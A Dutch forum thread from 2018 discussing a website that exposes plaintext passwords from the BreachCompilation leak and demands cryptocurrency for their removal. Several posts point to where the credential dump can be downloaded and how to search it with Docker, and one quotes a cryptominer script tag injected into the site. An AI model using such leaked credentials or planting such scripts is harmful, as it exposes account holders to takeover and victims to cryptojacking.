Zeg het maar, wat is de url?quote:Een nieuwe zoekmachine toont de volledige wachtwoorden van meer dan 1,4 miljard e-mailadressen. Daar zitten ook miljoenen wachtwoorden van Nederlanders bij. Het is ook mogelijk om wachtwoorden van andere mensen op te zoeken.
RTL Nieuws ontdekte de zoekmachine na een tip. Om ethische redenen noemen wij de naam van de zoekmachine niet. De website vind je op het normale internet, en niet op het dark web.
Bij Gotcha, een wachtwoordzoekmachine die vorige week in het nieuws kwam, werden alleen de eerste twee letters van een wachtwoord getoond. Deze gaat dus een stap verder.
Datalekken
De website is pas sinds kort online en laat je een e-mailadres invoeren. Daarna toont de website alle bekende gehackte wachtwoorden die zijn gekoppeld aan het e-mailadres.
De data zijn afkomstig uit tientallen grote datalekken van de afgelopen jaren, onder meer van LinkedIn, Dropbox, Playstation en eBay. Ondanks dat sommige wachtwoorden vrij oud zijn, gaat het wel om wachtwoorden die echt zijn gebruikt en soms nog steeds gebruikt worden, zo blijkt uit verschillende testen.
Geld aftroggelen
De beheerder van de website vraagt minstens 10 dollar aan bitcoin, ethereum of litecoin om je wachtwoorden van de website te verwijderen. Op die manier probeert hij geld af te troggelen van mensen.
In de lijst met gehackte wachtwoorden zijn ook (voormalige) wachtwoorden van Tweede Kamerleden, het ministerie van Defensie en de Belastingdienst te vinden.
Dat is die bekende. Die toont geen hele wachtwoordenquote:
Kinda dit inderdaad.quote:Op donderdag 12 april 2018 13:34 schreef Klaploper het volgende:
Ja mensen, controleer snel of je wachtwoord ertussen staat! Vul bijvoorbeeld vooral je persoonlijke e-mail in, en zoek daarna ook even de username van je internetbankieren, FOK!, of weet ik veel wat in! Ze zullen heus niet bijhouden welke verschillende usernames en wachtwoorden jij checkt, om zo accounts aan elkaar te koppelen en je nog vatbaarder te maken!
Ik zeg doen!
!!quote:
Stel dat jij ook op je tweede e-mailadres, of een andere username zoekt. Koppeling is gemaakt.quote:Op donderdag 12 april 2018 13:36 schreef TheoddDutchGuy het volgende:
[..]
Kinda dit inderdaad.
Jij gaat je gegevens invullen.. tada! ze hebben je gegevens lol.
Edit : Als ik alleen op email zoek, minder schadelijk hehe, word er in ieder geval niets gevonden op 1 oud mail adres na, zo te zien nog het wachtwoord van WoW van letterlijk meer dan 10 jaar geleden.
Je eigen wachtwoorden controlleer je gewoon op haveibeenpowned.quote:Op donderdag 12 april 2018 13:43 schreef Klaploper het volgende:
[..]
Stel dat jij ook op je tweede e-mailadres, of een andere username zoekt. Koppeling is gemaakt.
Weet jij veel of ze misschien ook een nieuwer wachtwoord je weten, maar niet tonen? Of dat die later nog een keer lekt.
Dan heb je ze lekker geholpen al je accounts en wachtwoorden aan elkaar te koppelen.
Kan alleen geopend worden met zo'n aparte browser toch?quote:Op donderdag 12 april 2018 13:50 schreef byah het volgende:
Hier staat een link, echter is dit naar deepweb
https://raidforums.com/Th(...)il-password-DATABASE
Daar geldt precies hetzelfde voor. Jij vult je e-mailadres in op haveibeenpowned, ziet een verouderd wachtwoord dus denkt dat je veilig zit. Vervolgens zoek je ook nog even je username op van je mobiele provider, FOK!, zorgverzekeraar of wat dan ook.quote:Op donderdag 12 april 2018 13:44 schreef _--_ het volgende:
[..]
Je eigen wachtwoorden controlleer je gewoon op haveibeenpowned.
Met deze website doe je andere dingen.
Pff. Hou eens op.quote:Op donderdag 12 april 2018 14:13 schreef Onnoman het volgende:
ik zou serieus uitkijken met het invoeren van je email adres in dit soort zoekengines
je cookies kunnen misschien uitgelezen worden waarmee je wachtwoorden automatisch worden aangevuld op websites..
ik ga echt niet mijn mailadres invoeren
Stil nou.quote:Op donderdag 12 april 2018 14:18 schreef Feejx het volgende:
[ afbeelding ]
Misschien handig of ze even alle @fok.nl accounts even het wachtwoord resetten (Y)
Agh heb al aantal keer gezegd dat ik op een account zit vanuit die leak maar niemand reageert.quote:
BreachCompilation van 40GB zit ook een mooie search tool bij.quote:Op donderdag 12 april 2018 14:19 schreef NoXia het volgende:
Gewoon even zoeken op breachcompilation.txt (4GB) en zelf even kijken hoe en wat
Weg gehaaldquote:Op donderdag 12 april 2018 14:20 schreef _--_ het volgende:
[..]
Ook leuk dat je iedereen zijn naam even online zet.
Dat is toch van github? BreachAnalysis?quote:
Ik heb via Docker een linux machine gelaunched in powershell.quote:Op donderdag 12 april 2018 14:33 schreef _--_ het volgende:
[..]
Dat is toch van github? BreachAnalysis?
Werkt dat ook op windows?
Does OS van linux is niet nodig?quote:Op donderdag 12 april 2018 14:34 schreef Feejx het volgende:
[..]
Ik heb via Docker een linux machine gelaunched in powershell.
Jawel maar je runt een container van linux op je windows machine.quote:Op donderdag 12 april 2018 14:35 schreef _--_ het volgende:
[..]
Does OS van linux is niet nodig?
Link naar dat docker gedoe.
Natuurlijk kan dat niet.quote:Op donderdag 12 april 2018 14:13 schreef Onnoman het volgende:
ik zou serieus uitkijken met het invoeren van je email adres in dit soort zoekengines
je cookies kunnen misschien uitgelezen worden waarmee je wachtwoorden automatisch worden aangevuld op websites..
ik ga echt niet mijn mailadres invoeren
Thnxquote:Op donderdag 12 april 2018 14:36 schreef Feejx het volgende:
[..]
Jawel maar je runt een container van linux op je windows machine.
https://www.docker.com/
dan een image pull doen van ubuntu of alpine.
via powershell:
docker run --rm -v windowslocatievanbestanden:/tmp/breach -ti ubuntu
Maakt niet uit, alle accounts die ik bezit, zitten achter of zijn gekoppeld aan bijv. een authenticator of andere vorm van 2-step.quote:Op donderdag 12 april 2018 13:43 schreef Klaploper het volgende:
[..]
Stel dat jij ook op je tweede e-mailadres, of een andere username zoekt. Koppeling is gemaakt.
Weet jij veel of ze misschien ook een nieuwer wachtwoord je weten, maar niet tonen? Of dat die later nog een keer lekt.
Dan heb je ze lekker geholpen al je accounts en wachtwoorden aan elkaar te koppelen.
Heb hier even geen tor browser ter beschikking.quote:Op donderdag 12 april 2018 14:41 schreef NoXia het volgende:
[..]
Serieus? Check even wat posts terug.
Kan gewoon met een normale browser.quote:Op donderdag 12 april 2018 14:42 schreef hmmmz het volgende:
[..]
Heb hier even geen tor browser ter beschikking.
http://breachedpasswords.website werkt nietquote:Op donderdag 12 april 2018 14:41 schreef NoXia het volgende:
[..]
Serieus? Check even wat posts terug.
Overbelastquote:Op donderdag 12 april 2018 14:44 schreef hmmmz het volgende:
[..]
http://breachedpasswords.website werkt niet
Jij bent ook niet de doorsnee internetgebruiker. Genoeg mensen die even al hun accounts checken, zien dat er maar één account van ze is gevonden met een verouderd wachtwoord, en dan denken dat zij veilig zijn. Niet wetende dat de kans dik aanwezig is dat er nu iemand is die al hun usernames aan elkaar gekoppeld heeft en daar vervelende dingen mee kan doen.quote:Op donderdag 12 april 2018 14:41 schreef TheoddDutchGuy het volgende:
[..]
Maakt niet uit, alle accounts die ik bezit, zitten achter of zijn gekoppeld aan bijv. een authenticator of andere vorm van 2-step.
Sowieso zou dat meer gepromote moeten worden, want dan hebben ze in vrijwel alle instanties niets aan alleen een wachtwoord.
of een stom grapje waardoor ik al minuten lang naar een ronddraaiend dingetje aan het kijken ben.quote:
Nee ding doet een ajax call op:quote:Op donderdag 12 april 2018 14:49 schreef hmmmz het volgende:
[..]
of een stom grapje waardoor ik al minuten lang naar een ronddraaiend dingetje aan het kijken ben.
Duurt wel heel erg lang danquote:Op donderdag 12 april 2018 14:52 schreef raptorix het volgende:
[..]
Nee ding doet een ajax call op:
https://leak.breachedpass(...)l=raptorix@gmail.com
Deze laad ook al tijdje, heb overigens de bestanden zelf gedownload, had alleen nog geen tijd gehad om ze goed te indexeren of the importeren in een database omdat mijn server maar beperkt geheugen heeft.
Site is op dit moment overbelast. De rest kan je zelf wel invullen denk ik.quote:
Beter zorgen ze dat de website niet zo snel overbelast raakt.quote:Op donderdag 12 april 2018 14:59 schreef NoXia het volgende:
[..]
Site is op dit moment overbelast. De rest kan je zelf wel invullen denk ik.
omg.quote:Op donderdag 12 april 2018 14:59 schreef hmmmz het volgende:
[..]
Beter zorgen ze dat de website niet zo snel overbelast raakt.
Anders doneer je even poeplapquote:Op donderdag 12 april 2018 15:02 schreef hmmmz het volgende:
[..]
Wat heb je nou aan een website die overbelast is?
Waarom, Zuck heeft je passwords toch alquote:Op donderdag 12 april 2018 15:18 schreef klappernootopreis het volgende:
Ik heb even mark zuckerberg gebeld, die wil dit in Facebook gaan gebruiken.
quote:Checking 1.4 billion entries...
It's a bit crowded... It seems that we've reached the news!
Please share to raise awareness. Too bad it takes a while now.
We're upscaling
en dan verdwijnt je username/password dus niet uit dat bestand van 48 GB. enkel van 1 website.quote:Op donderdag 12 april 2018 13:42 schreef _--_ het volgende:
[..]
Je betaalt niet voor het zoeken lul. Je betaalt voor het verwijderen. En die bestand is 48gb. Daar heb ik niet echt zin in.
Nou en? Er zullen veel meer mensen zijn die de website gaan gebruiken omdat er mensen bestaan die geen verstand hebben van een powershell.quote:Op donderdag 12 april 2018 15:40 schreef Shotty het volgende:
[..]
en dan verdwijnt je username/password dus niet uit dat bestand van 48 GB. enkel van 1 website.
dus waarom zou je daar voor betalen?
ik heb overigens niet met je op school gezeten, dus kies even een normale aanspreektitel.
Blijkbaar ben je van de frontpage hier, en dus onderdeel van de fok crew. met degelijke aanspreektitels haal je fok dus lekker door het slijk. maar goed, moet je zelf weten.quote:Op donderdag 12 april 2018 15:41 schreef _--_ het volgende:
[..]
Nou en? Er zullen veel meer mensen zijn die de website gaan gebruiken omdat er mensen bestaan die geen verstand hebben van een powershell.
Dat jij je op je pik getrapt voelt hoef je niet zo vaak te melden. FOK! is geen formele forum, dus als je niet tegen milde woordjes als "lul" kunt zou je snel moeten uitloggen.quote:Op donderdag 12 april 2018 15:45 schreef Shotty het volgende:
[..]
Blijkbaar ben je van de frontpage hier, en dus onderdeel van de fok crew. met degelijke aanspreektitels haal je fok dus lekker door het slijk. maar goed, moet je zelf weten.
ik heb het bestand overigens wel gedownload, en de zoekscripts zitten er bij, samen met een (duidelijke) handleiding..... er is wel degelijk moeite in gestoken om het erg gebruiksvriendelijk te maken. je hebt erg weinig it kennis nodig om het te kunnen gebruiken.
als jij betaald om het van de website af te halen, is het voor iemand ook meteen duidelijk dat het wachtwoord nog ergens in gebruik is.
Ik wou het even zeker weten..quote:Op donderdag 12 april 2018 15:27 schreef Tijger_m het volgende:
[..]
Waarom, Zuck heeft je passwords toch al
klopt. maar morgen is er een nieuwe website, waar je wachtwoord wel weer op staat. betaal je daar dan ook voor? en overmorgen weer een nieuwe.... zolang mensen daarvoor betalen, zullen dit soort websites de kop op blijven steken...quote:Op donderdag 12 april 2018 15:49 schreef _--_ het volgende:
[..]
Dat jij je op je pik getrapt voelt hoef je niet zo vaak te melden. FOK! is geen formele forum, dus als je niet tegen milde woordjes als "lul" kunt zou je snel moeten uitloggen.
En wat je hier beschrijft neemt nog niet weg dat er veel meer mensen de website zullen gebruiken dan de powershell methode. En misschien is dat betalen niet voor het wachtwoord, maar voor je email.
In clear text? Want bij de andere websites zie ik alleen de eerste twee letters maar dat zegt niets.quote:Op donderdag 12 april 2018 13:40 schreef Shotty het volgende:
de bestanden met usernames en passwords staan gewoon voor een ieder te downloaden op torrentsites zoals bv de piratebay...
Waarom zou je er in godsnaam voor betalen?
Ja.quote:Op donderdag 12 april 2018 16:05 schreef icecreamfarmer_NL het volgende:
[..]
In clear text? Want bij de andere websites zie ik alleen de eerste twee letters maar dat zegt niets.
Thuis maar eens downloaden.quote:
Klopt.quote:Op donderdag 12 april 2018 16:15 schreef icecreamfarmer_NL het volgende:
[..]
Thuis maar eens downloaden.
Deze toch he: breachcompilation.txt
Leuke cryptominerquote:
quote:Op donderdag 12 april 2018 16:30 schreef byah het volgende:
[..]
Leuke cryptominer
<script data-rocketsrc="//cryptaloot.pro/lib/crypta.js" type="text/rocketscript"></script>
Was inderdaad al vermeld.quote:Op donderdag 12 april 2018 16:30 schreef byah het volgende:
[..]
Leuke cryptominer
<script data-rocketsrc="//cryptaloot.pro/lib/crypta.js" type="text/rocketscript"></script>
Klopt, maar zijn alleen wachtwoorden, niet de usernames.quote:Op donderdag 12 april 2018 16:18 schreef NoXia het volgende:
[..]
Klopt.
breachcompilationuniq.txt is de gesorteerde versie zonder dubbele.
Die worden toch gebruikt voor bruteforce?quote:Op donderdag 12 april 2018 17:29 schreef raptorix het volgende:
[..]
Klopt, maar zijn alleen wachtwoorden, niet de usernames.
Dat zou kunnen.quote:Op donderdag 12 april 2018 17:29 schreef _--_ het volgende:
[..]
Die worden toch gebruikt voor bruteforce?
Net even gechecked, deze website gebruikt idd de database die al bekend was, had de files met combinatie van username/pw al gedownload en vond daar zelfde zaken in. Over het algemeen vermoed ik dat kwaadwillenden hier niet zoveel mee kunnen.quote:Op donderdag 12 april 2018 17:29 schreef _--_ het volgende:
[..]
Die worden toch gebruikt voor bruteforce?
Waar open ik die shit mee? Want de standaard textverwerkers gaan hier kapot op. Of heeft iemand een link naar het deepweb welke niet achter een spoilertag zitten.quote:Op donderdag 12 april 2018 16:18 schreef NoXia het volgende:
[..]
Klopt.
breachcompilationuniq.txt is de gesorteerde versie zonder dubbele.
Het was even een zoektocht, maar dat gaat met large text file viewer: https://www.portablefreeware.com/index.php?id=693quote:Op donderdag 12 april 2018 19:48 schreef icecreamfarmer_NL het volgende:
[..]
Waar open ik die shit mee? Want de standaard textverwerkers gaan hier kapot op. Of heeft iemand een link naar het deepweb welke niet achter een spoilertag zitten.
Ik had een log viewer geprobeerd maar die klapte eruit toen mijn 16 gig aan ram volzat.quote:Op donderdag 12 april 2018 20:08 schreef qltel het volgende:
[..]
Het was even een zoektocht, maar dat gaat met large text file viewer: https://www.portablefreeware.com/index.php?id=693
Keepass is een prima manager die dat ook kan.quote:Op vrijdag 13 april 2018 08:52 schreef archito het volgende:
Even tussendoor: Is bijvoorbeeld een website als lastpass echt veilig om te gebruiken?
Wat is een echt aan te raden wachtwoord manager die bijvoorbeeld ook zelf moeilijke wachtwoorden genereert?
|
Forum Opties | |
---|---|
Forumhop: | |
Hop naar: |